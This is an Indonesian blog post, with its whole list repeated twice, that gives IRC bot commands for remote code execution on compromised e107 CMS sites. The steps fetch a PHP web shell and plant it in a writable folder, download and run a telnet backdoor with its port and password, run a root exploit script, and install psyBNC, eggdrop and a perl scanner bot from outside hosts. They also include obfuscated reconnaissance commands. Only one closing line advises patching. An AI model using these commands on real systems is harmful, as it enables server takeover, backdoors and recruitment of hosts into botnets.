Beberapa Komen bot e107 yang Ane tau Ni Gan
!cmd www.f*asher.msk.su exec(pwd)
Hasil: /home/sloki/user/t85564/sites/everybodylovesirene.com/www/v2
2. List file and folder suatu direktori
!cmd www.f*asher.msk.su exec('cd /var/tmp; ls')
3. Mengetahui current folder yang fullwrite
!cmd www.f*asher.msk.su exec(base64_decode(\'ZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxz'\))
Hasil: /new/e107_files/cache
4. Tanam shell
!cmd www.f*asher.msk.su exec('cd /usr/home/bkdevils/domains/flasher.msk.su/public_html/magazin/templates_c;fetch http://ravenzzz.fileave.com/fxshell.txt;mv fxshell.txt shell.php;')
kalo berhasil, php shell berbentuk: http://www.f*asher.msk.su//magazin/templates_c/shell.php?
5. Install telnet
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://t.i.a.n.tripod.com/data/blind.tar.gz;tar -zxvf blind.tar.gz;rm blind.tar.gz;./blind;rm -rf blind ')
host: www.f*asher.msk.su
port: 1953
password: samboda
6. install root
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/root.pl;perl root.pl ')
7. install psyBNC
!cmd www.f*asher.msk.su ('cd /var/tmp;wget http://maybe8.webs.com/psy.tgz;tar -zxvf psy.tgz;rm psy.tgz;cd .cpanel;./config rontok 5566;./run psybnc')
8. Install eggdrop
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/e.tgz;tar -zxvf e.tgz;rm e.tgz ;cd .httpd;./crot nick ident ip channel owner;./start nick')
* Kalo perlu wget sekalian terobot.conf yang sudah Anda edit
9. Install bot perl
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget www.loyalmoses.com/junk/vopcrew_multiscanner.txt;perl vopcrew_multiscanner.txt')
10. Mengetahui type kernel
!cmd www.f*asher.msk.su php_uname()
hasil:Linux srv140 2.6.26-2-vserver-amd64 #1 SMP Thu Feb 11 02:19:12 UTC 2010 x86_64
11. mengetahui disable commands
!cmd www.f*asher.msk.su ini_get('disable_functions')
hasil:
disk_total_space, diskfreespace, exec, system, popen, proc_open, proc_nice, shell_exec, passthru, dl
Botnya serasa terintegrasi dengan shell, attacker bisa mengelola shell layaknya login telnet. Anda bisa mereplace index.php juga lho hati2 dengan defacing..
Bagi Anda pemakai e107, saya sarankan segera patching bug di site Anda. Gabung di e107 community untuk mendapatkan informasi seputar e107.
!cmd www.f*asher.msk.su exec(pwd)
Hasil: /home/sloki/user/t85564/sites/everybodylovesirene.com/www/v2
2. List file and folder suatu direktori
!cmd www.f*asher.msk.su exec('cd /var/tmp; ls')
3. Mengetahui current folder yang fullwrite
!cmd www.f*asher.msk.su exec(base64_decode(\'ZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxz'\))
Hasil: /new/e107_files/cache
4. Tanam shell
!cmd www.f*asher.msk.su exec('cd /usr/home/bkdevils/domains/flasher.msk.su/public_html/magazin/templates_c;fetch http://ravenzzz.fileave.com/fxshell.txt;mv fxshell.txt shell.php;')
kalo berhasil, php shell berbentuk: http://www.f*asher.msk.su//magazin/templates_c/shell.php?
5. Install telnet
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://t.i.a.n.tripod.com/data/blind.tar.gz;tar -zxvf blind.tar.gz;rm blind.tar.gz;./blind;rm -rf blind ')
host: www.f*asher.msk.su
port: 1953
password: samboda
6. install root
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/root.pl;perl root.pl ')
7. install psyBNC
!cmd www.f*asher.msk.su ('cd /var/tmp;wget http://maybe8.webs.com/psy.tgz;tar -zxvf psy.tgz;rm psy.tgz;cd .cpanel;./config rontok 5566;./run psybnc')
8. Install eggdrop
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/e.tgz;tar -zxvf e.tgz;rm e.tgz ;cd .httpd;./crot nick ident ip channel owner;./start nick')
* Kalo perlu wget sekalian terobot.conf yang sudah Anda edit
9. Install bot perl
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget www.loyalmoses.com/junk/vopcrew_multiscanner.txt;perl vopcrew_multiscanner.txt')
10. Mengetahui type kernel
!cmd www.f*asher.msk.su php_uname()
hasil:Linux srv140 2.6.26-2-vserver-amd64 #1 SMP Thu Feb 11 02:19:12 UTC 2010 x86_64
11. mengetahui disable commands
!cmd www.f*asher.msk.su ini_get('disable_functions')
hasil:
disk_total_space, diskfreespace, exec, system, popen, proc_open, proc_nice, shell_exec, passthru, dl
Botnya serasa terintegrasi dengan shell, attacker bisa mengelola shell layaknya login telnet. Anda bisa mereplace index.php juga lho hati2 dengan defacing..
Bagi Anda pemakai e107, saya sarankan segera patching bug di site Anda. Gabung di e107 community untuk mendapatkan informasi seputar e107.
0 Komentar